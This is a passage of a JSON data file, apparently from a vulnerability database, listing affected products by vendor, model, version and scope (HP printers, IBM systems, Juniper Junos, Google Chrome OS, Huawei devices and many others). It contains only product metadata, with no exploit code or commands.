        "vendor": "ibm",
        "version": "1.75"
      },
      {
        "model": "color laserjet m680 cz248a 2302963 436072",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.91"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "ape",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "hyperdp v200r001c91spc201",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x330073820"
      },
      {
        "model": "asset manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.40"
      },
      {
        "model": "unified attendant console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "dsr-500 1.09.b61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.3-64.4"
      },
      {
        "model": "s3900 v100r005",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor s5600t v100r005",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.19"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "4.1"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "enterprise linux server eus 6.3.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0"
      },
      {
        "model": "junos 10.2r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.10.140.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.32"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.6"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.1.3"
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "6.5"
      },
      {
        "model": "storevirtual 2tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.0"
      },
      {
        "model": "laserjet p3005 printer series q7814a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.190.3"
      },
      {
        "model": "ace application control engine module ace10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5600v110.1"
      },
      {
        "model": "rox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "20"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "36100"
      },
      {
        "model": "ive os 7.4r8",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.21"
      },
      {
        "model": "hi switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55000"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "5.7"
      },
      {
        "model": "laserjet enterprise m4555 mfp ce503a 2302963 436064",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "msr9xx family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "storevirtual 450gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.6"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "vcenter site recovery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1.1"
      },
      {
        "model": "nsx for multi-hypervisor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1.2"
      },
      {
        "model": "laserjet printer series q7698a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9040/90508.260.3"
      },
      {
        "model": "sbr enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.17"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.63"
      },
      {
        "model": "aura system manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "junos os 13.3r2-s3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "tivoli workload scheduler distributed fp07",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4"
      },
      {
        "model": "msr30 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "scale out network attached storage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.3"
      },
      {
        "model": "smart update manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3.1"
      },
      {
        "model": "manageone v100r002c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "hp-ux b.11.31",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "2.0.4"
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "7.0.2"
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "463011.5"
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x375087330"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.20"
      },
      {
        "model": "esight-ewl v300r001c10spc300",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "ave2000 v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "color laserjet enterprise cp4525 cc493a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.164.1"
      },
      {
        "model": "executive scorecard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.40"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.22"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0.2"
      },
      {
        "model": "websphere datapower b2b appliance xb62",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1"
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.0"
      },
      {
        "model": "laserjet multifunction printer series q3726a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9040/90508.290.2"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "9.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.82"
      },
      {
        "model": "color laserjet cp4005 printer series cb504a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "46.230.6"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "4.3.1"
      },
      {
        "model": "snapdrive for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "10.0.74.4"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "junos space 12.3p2.8",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.85"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.60"
      },
      {
        "model": "pulse desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "5.0"
      },
      {
        "model": "rational insight ifix1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1"
      },
      {
        "model": "fortios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.8"
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.12"
      },
      {
        "model": "tivoli workload scheduler distributed fp02",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "telepresence integrator c series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "laserjet m4345 multifunction printer cb425a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "8.4-prerelease",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.1"
      },
      {
        "model": "laserjet enterprise m602 series ce991a 2302963 436082",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "600"
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473011.5"
      },
      {
        "model": "malware analysis appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.1.2"
      },
      {
        "model": "usg9300 v200r001c01sph902",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "clearpass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "6.1.0"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.0.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.126.0"
      },
      {
        "model": "project openssl beta1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "anyoffice v200r002c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "digital media players series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "43000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60000"
      },
      {
        "model": "color laserjet flow m680 ca251a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.4"
      },
      {
        "model": "splunk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.9"
      },
      {
        "model": "cacheflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "2.0"
      },
      {
        "model": "aura session manager sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "31005.1.1"
      },
      {
        "model": "bbm for android",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "rim",
        "version": "2.2.1.40"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "13.10"
      },
      {
        "model": "virtual automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "parallels",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.68"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.0.0"
      },
      {
        "model": "color laserjet enterprise cp4025 cc490a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.34"
      },
      {
        "model": "snapdrive for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2.1"
      },
      {
        "model": "ds8870",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.50"
      },
      {
        "model": "color laserjet multifunction printer series cb481a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "400046.380.3"
      },
      {
        "model": "laserjet printer series q7545a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "52008.241"
      },
      {
        "model": "junos 13.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2143"
      },
      {
        "model": "family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "19100"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.1"
      },
      {
        "model": "usg9500 usg9500 v300r001c20",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "laserjet printer series q5406a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "43508.250.2"
      },
      {
        "model": "espace u2990 v200r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "forticlient build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.0591"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.34"
      },
      {
        "model": "studio",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.60"
      },
      {
        "model": "aura conferencing sp1 standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "laserjet enterprise mfp m525f cf116a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5000"
      },
      {
        "model": "color laserjet cp3525 cc468a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "cloudplatform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.2"
      },
      {
        "model": "telepresence isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32410"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.2.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.10"
      },
      {
        "model": "family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66020"
      },
      {
        "model": "ssl visibility",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.6"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.4x27.62"
      },
      {
        "model": "system m5 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x310054570"
      },
      {
        "model": "vcd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1.3"
      },
      {
        "model": "9.0-stable",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.4.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.8"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.4"
      },
      {
        "model": "telepresence ex series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "one-x mobile ces for iphone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "0"
      },
      {
        "model": "storevirtual 900gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473011.5"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "junos os 13.3r3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59200"
      },
      {
        "model": "security analytics platform",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.1.3"
      },
      {
        "model": "oceanstor s6800t v100r005c30spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "management center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1"
      },
      {
        "model": "manageone v100r001c02 spc901",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "junos 11.4r10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security information and event management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.2"
      },
      {
        "model": "xiv storage system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "281011.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.20"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.6"
      },
      {
        "model": "junos 12.1x45-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1.1"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "system x3500m2 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "78391.42"
      },
      {
        "model": "utm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "9.2"
      },
      {
        "model": "oceanstor s2600t v100r005",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "color laserjet cp5525 ce707a 2302963 436070",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "enterprise linux els",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v3500-"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.26"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.13"
      },
      {
        "model": "email and server security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "11.00"
      },
      {
        "model": "color laserjet cm6030 multifunction printer ce664a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "isoc v200r001c02spc202",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "9000"
      },
      {
        "model": "psb email and server security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "9.20"
      },
      {
        "model": "color laserjet cp3525 cc471a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "storevirtual 2tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453011.5"
      },
      {
        "model": "9.2-release-p4",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.155"
      },
      {
        "model": "ons series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "154000"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "4.3.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.2"
      },
      {
        "model": "unified intelligent contact management enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "junos space r1.8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "13.1"
      },
      {
        "model": "clearpass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "6.1.4"
      },
      {
        "model": "webapp secure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "anyconnect secure mobility client for ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "security threat response manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2013.2"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.9.11"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.70"
      },
      {
        "model": "utm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "8.3"
      },
      {
        "model": "aura system manager sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "policy center v100r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x357087180"
      },
      {
        "model": "laserjet enterprise p3015 ce526a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.50"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.0"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.0.14"
      },
      {
        "model": "junos 12.3r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.4"
      },
      {
        "model": "color laserjet cp6015 q3934a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "53.236.1"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2.170"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v3700-"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.92"
      },
      {
        "model": "colorqube ps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xerox",
        "version": "88704.76.0"
      },
      {
        "model": "web security gateway anywhere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.8.1"
      },
      {
        "model": "updatexpress system packs installer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.60"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "oncommand unified manager core package",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "5.0"
      },
      {
        "model": "sterling connect:direct for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.0"
      },
      {
        "model": "video surveillance 4300e/4500e high-definition ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smart update manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.4.1"
      },
      {
        "model": "director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.1"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.21"
      },
      {
        "model": "system type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x3950x638370"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.3.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.85"
      },
      {
        "model": "one-x communicator for mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "x1.0"
      },
      {
        "model": "color laserjet multifunction printer series cb480a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "400046.380.3"
      },
      {
        "model": "vm virtualbox 4.2.0-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "oracle",
        "version": null
      },
      {
        "model": "color laserjet cm4540 mfp cc421a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.5.2"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.50"
      },
      {
        "model": "color laserjet multifunction printer series cb482a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "400046.380.3"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.16"
      },
      {
        "model": "sdn for virtual environments",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1"
      },
      {
        "model": "laserjet multifunction printer series q3944a",
        "scope": "ne",
        "trust": 0.3,
